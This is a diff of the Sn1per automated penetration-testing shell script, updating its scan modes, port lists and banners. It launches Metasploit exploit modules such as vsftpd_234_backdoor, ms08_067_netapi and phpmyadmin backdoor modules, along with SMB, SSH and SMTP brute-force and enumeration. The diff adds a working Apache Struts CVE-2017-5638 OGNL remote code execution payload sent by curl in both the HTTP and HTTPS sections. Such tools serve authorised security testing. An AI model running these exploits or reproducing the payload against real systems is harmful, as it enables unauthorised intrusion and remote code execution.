echo -e "$OKORANGE + -- --=[Done!$RESET"
}
function help {
@@ -134,13 +135,14 @@ function help {
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo -e "$OKORANGE + -- --=[Usage:"
echo ""
echo ' [*] sniper <target> <report>'
echo ' [*] sniper <target> stealth <report>'
echo ' [*] sniper <CIDR> discover'
echo ' [*] sniper <target> port <portnum> '
echo ' [*] sniper <target> port <portnum>'
echo ' [*] sniper <target> fullportonly <portnum>'
echo ' [*] sniper <target> web <report>'
echo ' [*] sniper <target> nobrute <report>'
echo ' [*] sniper <targets.txt> airstrike <report>'
@@ -171,7 +173,7 @@ if [ -z $TARGET ]; then
echo -e "$OKRED /_/ $RESET"
echo -e ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
echo ""
exit
@@ -220,7 +222,7 @@ if [ "$MODE" = "discover" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
arp -a -n
echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
unicornscan $TARGET 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
cat $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
@@ -258,7 +260,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e "$OKRED "
echo -e "$OKRED ./\."
echo -e "$OKRED ./ '\."
@@ -313,22 +315,20 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done;
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus" 2>/dev/null; done;
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
fi
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -364,7 +364,7 @@ if [ "$MODE" = "stealth" ]; then
sslscan --no-failed $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$a-port443.jpg"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$TARGET-port443.jpg"
fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
@@ -400,7 +400,7 @@ if [ "$MODE" = "airstrike" ]; then
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
for a in `cat $TARGET`;
do
@@ -460,20 +460,20 @@ if [ "$MODE" = "airstrike" ]; then
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$a-full.txt"
cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
fi
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
nmap -sS -T5 --open -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
@@ -532,6 +532,23 @@ if [ "$MODE" = "airstrike" ]; then
exit
fi
if [ "$MODE" = "fullportonly" ]; then
echo -e "$OKRED ___ ____ __ __ $RESET"
echo -e "$OKRED / _/_ __/ / /__ ___ ____/ /____ ___ / /_ __$RESET"
echo -e "$OKRED / _/ // / / / _ \/ _ \/ __/ __/ _ \/ _ \/ / // /$RESET"
echo -e "$OKRED /_/ \_,_/_/_/ .__/\___/_/ \__/\___/_//_/_/\_, / $RESET"
echo -e "$OKRED /_/ /___/ $RESET"
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p 1-65535 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p $OPT1 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
exit
fi
if [ "$MODE" = "port" ]; then
if [ -z "$OPT1" ]; then
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
@@ -588,7 +605,7 @@ echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
nslookup $TARGET
@@ -615,14 +632,14 @@ then
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
fi
@@ -632,18 +649,16 @@ ping -c 1 $TARGET
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
nmap -sS -T5 --open -P0 -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
elif [ "$OPT1" == "web" ]; then
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sV -T5 -P0 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 -P0 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 -p U:$OPT1 --open $TARGET
nmap -sU -T5 -P0 -p U:$OPT1 --open $TARGET
fi
service postgresql start
if [ -z $DISABLE_POSTGRESQL ]; then service postgresql start; fi
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET"
@@ -680,6 +695,7 @@ port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -688,6 +704,10 @@ port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
if [ -z "$port_21" ];
@@ -695,7 +715,7 @@ then
echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -707,7 +727,7 @@ else
cd $PLUGINS_DIR/ssh-audit
python ssh-audit.py $TARGET:22
cd $INSTALL_DIR
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
@@ -718,7 +738,7 @@ else
echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
echo ""
cisco-torch -A $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
fi
@@ -727,7 +747,7 @@ then
echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
fi
@@ -737,7 +757,7 @@ then
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
fi
if [ -z "$port_79" ];
@@ -745,7 +765,7 @@ then
echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
bin/fingertool.sh $TARGET $USER_FILE
fi
@@ -822,7 +842,7 @@ else
then
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -848,12 +868,18 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -866,7 +892,7 @@ then
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
fi
if [ -z "$port_111" ];
@@ -898,7 +924,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1007,7 +1033,7 @@ else
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb https://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -1037,14 +1063,20 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
if [ -z $GHDB ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -1063,7 +1095,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1096,7 +1128,7 @@ then
echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
else
